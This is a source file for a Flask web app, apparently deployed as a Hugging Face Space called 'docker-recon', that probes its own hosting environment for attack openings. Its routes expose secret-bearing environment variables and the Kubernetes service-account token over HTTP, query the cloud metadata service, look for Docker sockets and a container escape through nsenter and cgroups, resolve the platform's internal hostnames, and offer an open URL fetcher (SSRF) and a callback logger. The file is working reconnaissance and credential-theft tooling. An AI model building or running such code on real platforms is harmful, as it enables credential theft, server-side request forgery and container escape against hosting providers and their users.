docker-recon / app.py
dia2diab's picture
Fix route registration order, all routes before main
9c6355b
import os, subprocess, json, socket
from flask import Flask, jsonify, request
app = Flask(__name__)
webhook_log = []
@app.route("/")
def index():
return "<h1>Docker Recon</h1><ul><li><a href='/env'>Env</a></li><li><a href='/meta1'>AWS Meta v1</a></li><li><a href='/ping_meta'>Ping Meta</a></li><li><a href='/k8s'>K8s</a></li><li><a href='/net'>Net</a></li><li><a href='/proc'>Proc</a></li><li><a href='/dns'>DNS</a></li><li><a href='/escape'>Escape</a></li><li><a href='/webhook_log'>Webhook Log</a></li><li><a href='/fetch?url=http://example.com'>Fetch URL</a></li></ul>"
@app.route("/env")
def env():
r = {}
r["all_env"] = {k:v for k,v in sorted(os.environ.items())
if any(x in k.upper() for x in ["TOKEN","KEY","SECRET","AWS","HF_","SPACE_","KUBE","DOCKER","API","GOOGLE","AZURE","CRED","PASSWORD","MONGO","REDIS","DATABASE","SERVICE"])}
r["all_env_keys"] = sorted(os.environ.keys())
try:
with open("/var/run/secrets/kubernetes.io/serviceaccount/token") as f:
r["k8s_sa_token"] = f.read()[:100] + "..."
except: r["k8s_sa_token"] = "not found"
try:
with open("/proc/1/environ", "rb") as f:
envs = f.read().decode("utf-8", errors="replace").split("\0")
r["proc1_env"] = [e for e in envs if any(x in e.upper() for x in ["TOKEN","KEY","SECRET","AWS","HF_","KUBE","CRED"])]
except Exception as e: r["proc1_env"] = str(e)
return jsonify(r)
@app.route("/meta1")
def meta1():
r = {}
try:
p = subprocess.run(["curl", "-sv", "-m", "5", "http://169.254.169.254/latest/meta-data/"],
capture_output=True, text=True, timeout=8)
r["stdout"] = p.stdout[:1000]
r["stderr"] = p.stderr[:1000]
r["rc"] = p.returncode
except Exception as e: r["error"] = str(e)
return jsonify(r)
@app.route("/ping_meta")
def ping_meta():
r = {}
try:
p = subprocess.run(["arp", "-n"], capture_output=True, text=True, timeout=5)
r["arp"] = p.stdout[:500]
except: pass
try:
p = subprocess.run(["ip", "route", "get", "169.254.169.254"],
capture_output=True, text=True, timeout=5)
r["route"] = p.stdout
except: pass
return jsonify(r)
@app.route("/k8s")
def k8s():
r = {}
k8s_host = os.environ.get("KUBERNETES_SERVICE_HOST", "")
k8s_port = os.environ.get("KUBERNETES_SERVICE_PORT", "")
r["k8s_env"] = {"host": k8s_host, "port": k8s_port}
if k8s_host:
for path in ["/version", "/healthz"]:
try:
cmd = ["curl", "-sv", "-m", "3", "-k", f"https://{k8s_host}:{k8s_port}{path}"]
p = subprocess.run(cmd, capture_output=True, text=True, timeout=5)
r[f"k8s{path}"] = {"stdout": p.stdout[:300], "stderr": p.stderr[:300], "rc": p.returncode}
except Exception as e: r[f"k8s{path}"] = str(e)
return jsonify(r)
@app.route("/net")
def net():
r = {}
try:
p = subprocess.run(["ip", "addr"], capture_output=True, text=True, timeout=5)
r["ip_addr"] = p.stdout[:1000]
except: pass
try:
p = subprocess.run(["ip", "route"], capture_output=True, text=True, timeout=5)
r["ip_route"] = p.stdout[:500]
except: pass
try:
with open("/etc/resolv.conf") as f: r["resolv"] = f.read()
except: pass
try:
with open("/etc/hosts") as f: r["hosts"] = f.read()
except: pass
return jsonify(r)
@app.route("/proc")
def proc():
r = {}
try:
p = subprocess.run(["ps", "aux"], capture_output=True, text=True, timeout=5)
r["ps"] = p.stdout[:2000]
except: pass
try:
with open("/proc/1/cgroup") as f: r["cgroup"] = f.read()[:500]
except: pass
try:
p = subprocess.run(["cat", "/proc/1/status"], capture_output=True, text=True, timeout=5)
for line in p.stdout.split("\n"):
if "Cap" in line: r.setdefault("caps", []).append(line.strip())
except: pass
try:
p = subprocess.run(["id"], capture_output=True, text=True, timeout=5)
r["id"] = p.stdout.strip()
except: pass
try:
with open("/proc/1/status") as f:
for line in f:
if "Seccomp" in line: r["seccomp"] = line.strip()
except: pass
return jsonify(r)
@app.route("/dns")
def dns():
r = {}
for q in ["kubernetes.default.svc.cluster.local", "cas-server.xethub.hf.co"]:
try:
p = subprocess.run(["dig", "+short", q], capture_output=True, text=True, timeout=5)
r[q] = p.stdout.strip() if p.stdout.strip() else "NXDOMAIN"
except Exception as e: r[q] = str(e)
return jsonify(r)
@app.route("/escape")
def escape():
r = {}
for sock in ["/var/run/docker.sock", "/run/containerd/containerd.sock",
"/run/docker.sock", "/var/run/containerd/containerd.sock"]:
r[f"socket_{sock}"] = os.path.exists(sock)
try:
with open("/proc/mounts") as f:
for line in f:
if "overlay" in line and "upperdir" in line:
parts = line.split(",")
for p in parts:
if p.startswith("upperdir="):
upperdir = p.split("=")[1]
r["overlay_upperdir"] = upperdir
parent = os.path.dirname(os.path.dirname(upperdir))
try:
r["overlay_siblings"] = os.listdir(parent)[:20]
except Exception as e:
r["overlay_siblings"] = str(e)
except Exception as e: r["overlay_error"] = str(e)
try:
with open("/proc/1/root/etc/hostname") as f:
r["host_hostname"] = f.read().strip()
except Exception as e: r["host_hostname"] = str(e)
try:
r["sysrq_writable"] = os.access("/proc/sysrq-trigger", os.W_OK)
except: r["sysrq_writable"] = False
try:
cg_root = "/sys/fs/cgroup"
if os.path.isdir(cg_root):
r["cgroup_root"] = os.listdir(cg_root)[:20]
r["cgroup_writable"] = os.access(cg_root, os.W_OK)
except Exception as e: r["cgroup_error"] = str(e)
try:
with open("/proc/1/status") as f:
for line in f:
if "Seccomp" in line:
r["seccomp"] = line.strip()
except: pass
try:
r["dev_listing"] = os.listdir("/dev")[:30]
except: pass
try:
p = subprocess.run(["nsenter", "--target", "1", "--mount", "--", "hostname"],
capture_output=True, text=True, timeout=5)
r["nsenter"] = {"stdout": p.stdout, "stderr": p.stderr, "rc": p.returncode}
except Exception as e: r["nsenter"] = str(e)
try:
r["namespaces"] = {}
for ns in os.listdir("/proc/1/ns"):
r["namespaces"][ns] = os.readlink(f"/proc/1/ns/{ns}")
except Exception as e: r["ns_error"] = str(e)
return jsonify(r)
@app.route("/webhook", methods=["GET", "POST", "PUT", "DELETE", "PATCH"])
def webhook():
entry = {
"method": request.method,
"headers": dict(request.headers),
"body": request.get_data(as_text=True)[:5000],
"args": dict(request.args),
"remote_addr": request.remote_addr,
}
webhook_log.append(entry)
while len(webhook_log) > 10:
webhook_log.pop(0)
return jsonify({"status": "ok"})
@app.route("/webhook_log")
def get_webhook_log():
return jsonify(webhook_log)
@app.route("/fetch")
def fetch():
url = request.args.get("url", "http://example.com")
r = {}
try:
p = subprocess.run(["curl", "-sv", "-m", "5", url],
capture_output=True, text=True, timeout=8)
r["stdout"] = p.stdout[:2000]
r["stderr"] = p.stderr[:1000]
r["rc"] = p.returncode
except Exception as e: r["error"] = str(e)
return jsonify(r)
if __name__ == "__main__":
app.run(host="0.0.0.0", port=7860)